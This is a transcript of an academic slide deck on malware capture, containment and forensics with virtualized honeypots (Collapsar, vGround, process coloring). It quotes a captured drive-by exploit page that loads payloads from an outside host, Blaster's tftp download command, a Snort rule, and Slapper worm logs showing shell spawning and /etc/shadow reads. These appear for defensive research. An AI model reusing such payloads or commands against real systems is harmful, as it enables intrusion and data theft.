Enabling Internet Malware Investigation and Defense Using Virtualization - PowerPoint PPT Presentation

About This Presentation

Title:

Enabling Internet Malware Investigation and Defense Using Virtualization

Description:

Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu ... Information Assurance and Security (CERIAS) Purdue University – PowerPoint PPT presentation

Number of Views:269

Avg rating:3.0/5.0

Slides: 49

Provided by: jia92

Learn more at: https://friends.cs.purdue.edu

Category:

more less

Transcript and Presenter's Notes

Title: Enabling Internet Malware Investigation and Defense Using Virtualization

1

Enabling Internet Malware Investigation and
Defense Using Virtualization
Dongyan Xu
Department of Computer Science and
Center for Education and Research in
Information Assurance and Security (CERIAS)
Purdue University

2
Collaborators

Florian Buchholz (James Madison U.)
Xuxian Jiang (George Mason U.)
Junghwan Rhee (Purdue U.)
Ryan Riley (Purdue U.)
Eugene H. Spafford (Purdue U.)
AAron Walters (Fortify Research)
Helen Wang (Microsoft Research)
Yi-Min Wang (Microsoft Research)

3
Motivation Rampant Malware Outbreaks

Internet malware remains a top threat
Malware Virus, Worm, Spyware, Keylogger, Bot

Blaster
CodeRed
Nimda
Source Symantec Internet Security Threat Report
4
Motivation Stealthy Malware

Recruiting Vulnerable Nodes (e.g. to create
Botnet)
Zero-day exploits w/o software patches
Low-and-slow propagation
New attack strategies
Exploiting vulnerable client-side software, such
as IE
Propagating malware with RFID tags
Providing Value-Added Service (or rather, harm)
DDoS, spamming, identity theft,
Sell/rent botnets for profit

5
Reality Challenges

Lack of investigation platform that enables
Early detection and capture of malware incidents
Replay and observation of malware behavior
At Internet scale this is hard to build
Increased spreading speed,

sophistication, and malice
Slammer Worms infect 75,000 hosts in 10 minutes
(Moore et al, 2003)
Stealthy Malware, Zero-day Exploits, Mutations,
6
Our Integrated Malware Research Framework
Investigation
Defense
Detection
Virtualization
External Infection
WORM06
Internal Contamination
Back-End vGround Playground
Front-End Collapsar Honeyfarm
vGround RAID05
Proc. Coloring ICDCS06
Collapsar Security04, NDSS06, JPDC06
7
Part I Malware Capture
WORM06
Front-End Collapsar
Back-End vGround
vGround RAID05
Collapsar Security04, NDSS06, JPDC06
Coloring ICDCS06
8
Existing Approach Honeypot
Domain A
Domain C
Internet
Domain B

Two Weaknesses
Manageability vs. Detection Coverage
Security Risks ? On-Site Attack Occurrences

9
Our Approach Collapsar
Domain A
Benefit 2 Off-site attack occurrences
Redirector
Domain C
Front-End
Redirector
Redirector
Domain B
Collapsar Center
VM-based Honeypots
Management Station
Correlation Engine
Benefit 1 Centralized management of honeypots
w/ distributed (virtual) presence
Benefit 3 New possibilities for real-time
attack correlation and log mining
Collapsar Honeyfarm
10
Collapsar as a Server-side Honeyfarm

Passive Honeypots w/ Vulnerable Server-side
Software
Web Servers (e.g., Apache, IIS, )
Database Servers (e.g., Oracle, MySQL, )

Blaster (2003)
Sasser (2004)
Zotob (2005)
11
Collapsar as a Client-side Honeyfarm

Active Honeypots w/ Vulnerable Client-side
Software
Web Browsers (e.g., IE, Firefox, )
Email Clients (e.g., Outlook, )

PlanetLab (310 sites)
HoneyMonkey, NDSS06
288 malicious sites / 2 zero-day exploits
12
A Real Incident Exploitation of Client-side
Vulnerability

Upon Clicking a malicious URL
http//xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
Result

lthtmlgtltheadgtlttitlegtlt/titlegtlt/headgtltbodygt ltstylegt
CURSOR url("http//vxxxxxxe.biz/adverts/033/sp
loit.anr") lt/stylegt ltAPPLET ARCHIVE'count.jar'
CODE'BlackBox.class' WIDTH1 HEIGHT1gt ltPARAM
NAME'url' VALUE'http//vxxxxxxe.biz/adverts/033/
win32.exe'gtlt/APPLETgt ltscriptgt try document.writ
e('ltobject data10911545105116115
58 109104116109108581021051081
0158 //C\fo''o.mht!''http//vxxxx''xxe.biz/
/adv''erts//033//targ.ch' 'm/targ''et.htm
typetext/x-scriptletgtlt/ob''jectgt') catch(e)
lt/scriptgt lt/bodygtlt/htmlgt
MS05-002
MS03-011
MS04-013
22 unwanted programs are installed without users
consent!
13
Related Work
Honeyd Security04 iSinkRAID04 IMSNDSS05 honeyclient RECON05 Domino NDSS04 NetBait03 Potemkin SOSP05 GQ06 Collapsar Security04, JPDC06
High-Interaction w/ Real Services
Off-Site Attack Occurrences
Aggregation of Scattered Unused Address Space
Passive Active Honeypots
Passive Active
Passive
Passive
Passive
Active
14
Part II Malware Playground
Front-End Collapsar
Back-End vGround
vGround RAID05
Collapsar Security04, NDSS06, JPDC06
Coloring ICDCS06
15
Challenges

Fidelity ? Real worms
Confinement ? Destructive worms
Scalability ? Epidemic propagation pattern
Experimental Efficiency

16
A Virtualization-Based Worm Playground
A Worm Playground

High Fidelity
VM Full-System Virtualization
Strict Confinement
VN Link-Layer Network Virtualization
Easy Deployment
Locally deployable
Efficient Experiments
Images generation time 60 seconds
Boot-strap time 90 seconds
Tear-down time 10 seconds

Virtualization
paris.cs.purdue.edu
In Fighting Computer Virus Attacks, Peter Szor,
USENIX Security Symp., 2004
17
Challenge in Achieving Scalability

Three Main Techniques
VM Footprint Minimization
Redhat 9.0 1G ? 32M
Delta Virtualization (a.k.a., Copy-on-Write)
Worm-driven vGround Runtime Expansion
2000 virtual nodes in 10 physical machines

18
Worm Experts Comments on vGround
19
vGround Impact Applications

Evaluation
Correctness of documented worm/malware analysis
Effectiveness of defense mechanisms
Education Potentials

20
Part III Malware Defense
Internal Contamination
Front-End Collapsar
Back-End vGround
vGround RAID05
Collapsar Security04, NDSS06, JPDC06
Coloring ICDCS06
21
Malware Forensics

For each malware incident, it is desirable to
find out
Break-in Point
How did the malware break into the system?
Contaminations
What did the malware do after the break-in?

22
Current Approach
Question 1 How did the malware break into the
system?
Question 2 What did the malware do after
break-in?

/etc/shadow
Confidential Info

httpd
httpd
netcat
/bin/sh
Local files
Alert
wget
Root kit
23
Current Approach
1 Online Log Collection
Log
/bin/sh CREATES a new process netcat
netcat READS /etc/shadow file
httpd READS an incoming request

/etc/shadow
Confidential Info

httpd
httpd
netcat
/bin/sh MODIFIES local files
/bin/sh
httpd CREATES a new process /bin/sh
Local files
Alert
/bin/sh CREATES a new process wget
wget
Root kit
wget CREATES local file(s) - Root kit
24
Current Approach
1 Online Log Collection
httpd CREATES a new process /bin/sh
2 Offline Backward Tracking
Log
wget CREATES local file(s) - Root kit
/bin/sh CREATES a new process wget
Break-in Point !
httpd
/bin/sh
Alert
wget
Root kit
Backward Tracking
King, SOSP03
25
Current Approach
1 Online Log Collection
2 Offline Backward Tracking
Log
netcat READS /etc/shadow file
3 Offline Forward Tracking
/bin/sh CREATES a new process netcat
Break-in Point !

/etc/shadow
Confidential Info

httpd
netcat
/bin/sh MODIFIES local files
/bin/sh
httpd CREATES a new process /bin/sh
Local files
Forward Tracking
Alert
/bin/sh CREATES a new process wget
wget
Root kit
wget CREATES local file(s) - Root kit
26
Weaknesses of Current Approach
Analyze the entire log !

Backward Tracking ? Break-in Point
Inputs Detection point and the entire Log
Forward Tracking ? Contaminations
Inputs Break-in point and the entire Log

High Volume Log Data 1.2 gigabytes per day
under server workload
time
27
Our Approach - Process Coloring

Main Idea Information Flow-Preserving Logging

A suspicious log entry
Log
28
Our Approach - Process Coloring
1 Initial Coloring
s30sendmail
s30sendmail
Log
s55sshd
s55sshd
s45named
s45named
Benefit 2 Color-based log partition for
contamination analysis
s80httpd
rc
init
s80httpd

/etc/shadow
Confidential Info

httpd
netcat
Benefit 1 Immediate identification of break-in
point
/bin/sh
Local files
2 Coloring Diffusion
Alert
wget
Root kit
29
Color Diffusion Model

Color Diffusion Model
OS-level Information Flow (Buchholz 2005)

syscalls
Operation
Diffusion

30
Process Coloring Log Slapper Worm

...
BLUE 673"sendmail" 5_open("/proc/loadavg", 0,
438) 5
BLUE 673"sendmail" 192_mmap2(0, 4096, 3, 34,
4294967295, 0) 1073868800
BLUE 673"sendmail" 3_read(5, "0.26 0.10 0.03
2...", 4096) 25
BLUE 673"sendmail" 6_close(5) 0
BLUE 673"sendmail" 91_munmap(1073868800,
4096) 0
...
RED 2568"httpd" 102_accept(16, sockaddr2,
cbbdff3a, cbbdff38) 5
RED 2568"httpd" 3_read(5, "\1281\1\0\2\0\24...
", 11) 11
RED 2568"httpd" 3_read(5, "\7\0À\5\0\128\3\...
", 40) 40
RED 2568"httpd" 4_write(5, "\132_at_\4\0\1\0\2\..
.", 1090) 1090
RED 2568"httpd" 4_write(5, "\128\19Ê\136\18\..
.", 21) 21
RED 2568"httpd" 63_dup2(5, 2) 2
RED 2568"httpd" 63_dup2(5, 1) 1
RED 2568"httpd" 63_dup2(5, 0) 0
RED 2568"httpd" 11_execve("/bin//sh",
bffff4e8, 00000000)
RED 2568"sh" 5_open("/etc/ld.so.prelo...", 0,
8) -2
RED 2568"sh" 5_open("/etc/ld.so.cache", 0, 0)
6

31
Evaluation
Lion Slapper SARS
Time period being analyzed 24 hours 24 hours 24 hours
worm-related entries 66,504 195,884 19,494
Exploited Service BIND (CVE-2001-0010) Apache (CAN-2002-0656) Samba (CAN-2003-0085)
of Log Inspected 48.7 65.9 12.1
Benefit for Backward Tracking Immediate
identification of break-in point
Benefit for Forward Tracking Reduced log volume
for contamination analysis
32
Challenge in Log Collection

System Call Interception

User Process 1
User Process 2
Logging

OS Kernel
Question Can we trust a compromised system to
collect log information?
33
Virtual Machine Introspection Garfinkel,
NDSS03

Interception on system virtualization path

More tamper-resistant
Virtual Machine
User Process 1
User Process 2
Logging

Logging
OS Kernel
Guest OS Kernel/UML
34
On-going Work

Multi-Dimensional Worm Profiling Identification
Content Fingerprinting
Unique recurring content
Behavioral Footprinting
Unique recurring behavior ? Infection Cycle
Probing ? Exploitation ? Replication ? Payload

35
MSBlaster/Windows Worm
10. Closes connection

Shell closes

8. Sends START msblast.exe command
9. Runs worm on target!
?
gttftp I 192.168.0.1 GET msblast.exe
7. Runs TFTP command teleports
msblast.exe file
6. Sends TFTP command to shell
5. Creates TFTP Server on port 69/UDP
4. Creates a shell cmd.exe and binds it to
port 4444/TCP
3. Connects to target on port 4444/TCP

2. Binds svchost.exe to port
4444/TCP via injected code

Exploits target on port 135/TCP

Blaster
Target/RPC
alert ip EXTERNAL_NET any -gt HOME_NET 135
(msg"RPC DCOM exploit/ Blaster Worm Attack"
content" 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F
32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B "
)
192.168.0.1
192.168.10.11
36
Worm Name Infection Vector Behavioral Footprints

MSBlaster
RPC-DOM
Exploitation
alert ip EXTERNAL_NET any -gt HOME_NET 135
(msg"RPC DCOM exploit/ Blaster Worm Attack"
content" 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F
32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B "
)
Replication
37
Worm Name Infection Vector Behavioral Footprints

MSBlaster
RPC-DOM
Welchia
Sasser
LSASS
LPRng
Ramen
WU-FTPD
NFS-UTILS
Lion
BIND
Slapper
APACHE
SARS
SAMBA
38
Summary
Domain A
Redirector
Domain C
Front-End
Redirector
Redirector
Domain B
Collapsar

vGround I
vGround II
Design and evaluation of advanced malware defense
mechanisms using our unique integrated malware
research platform
39
Thank you.
For more information Email dxu_at_cs.purdue.edu U
RL http//www.cs.purdue.edu/dxu
40

Backup Slides

41
Another Example Incident Windows XP
Server-side Honeypot/VMware

Vulnerability
RPC DCOM vulnerability (Microsoft Security
Bulletin MS03-026)
Time-line
Deployed 221000pm, 11/26/03
MSBlast 003647am, 11/27/03
Enbiei 014857am, 11/27/03
Nachi 070355am, 11/27/03

http//www.cs.purdue.edu/homes/jiangx/collapsar
42
vGround Network Virtualization
Option 1 Network-Layer Virtualization (e.g.,
X-Bone)
IP-IP
Guest OS
Virtual Switch 1
Host OS / VMM
Host OS / VMM
Option 2 Link-Layer Virtualization (e.g., VIOLIN)
43
Logging Integrity -- Existing Approach
System call interception
fork(/bin/sh)
result
restart
0
sys_restart_syscall
exit
1
sys_exit
System Call Dispatcher
fork
2
sys_fork
result
read
3
sys_read
write
4
sys_write
result
ni_syscall
283
sys_ni_syscall
System Call Table
Unreliable!
44
Virtual Machine Introspection Garfinkel,
NDSS03

Interception at System Virtualization Path

Guest OS 2
Guest OS 2
Logging
Logging
Tamper-Resistant!
45
Process Coloring -- Slapper Worm
inet_sock(80)
recv
2568 httpd
accept
execve
fd 5
dup2, read
2568(execve) /bin//sh
execve
2568(execve) /bin/bash -i
fork, execve
fork, execve
2586 /bin/rm rf /tmp/.bugtraq.c
2587 /bin/cat
open, dup2, write
unlink
/tmp/.uubugtraq
/tmp/.bugtraq.c
46
Process Coloring Log Slapper Worm
47
Counter-attacks against Proc. Coloring

Coloring mixing attack
Good news an important anomaly itself
Bad news need for advanced filtering policies
Low-level attack
Kernel integrity (e.g. CoPilot, Livewire,
Pioneer)
Shadow structure via VMM
Diffusion-cutting attack
Covert channels

48
Footprinting Representation
MSBlaster Worm
1st TCP handshake
135/TCP
RST
alert ip EXTERNAL_NET any -gt HOME_NET 135
(msg"RPC DCOM exploit/ Blaster Worm Attack"
content" 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F
32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B "
)
2nd TCP handshake
4444/TCP (shell)
Sending tftp
69/UDP (tftp)
RST

Write a Comment

User Comments (0)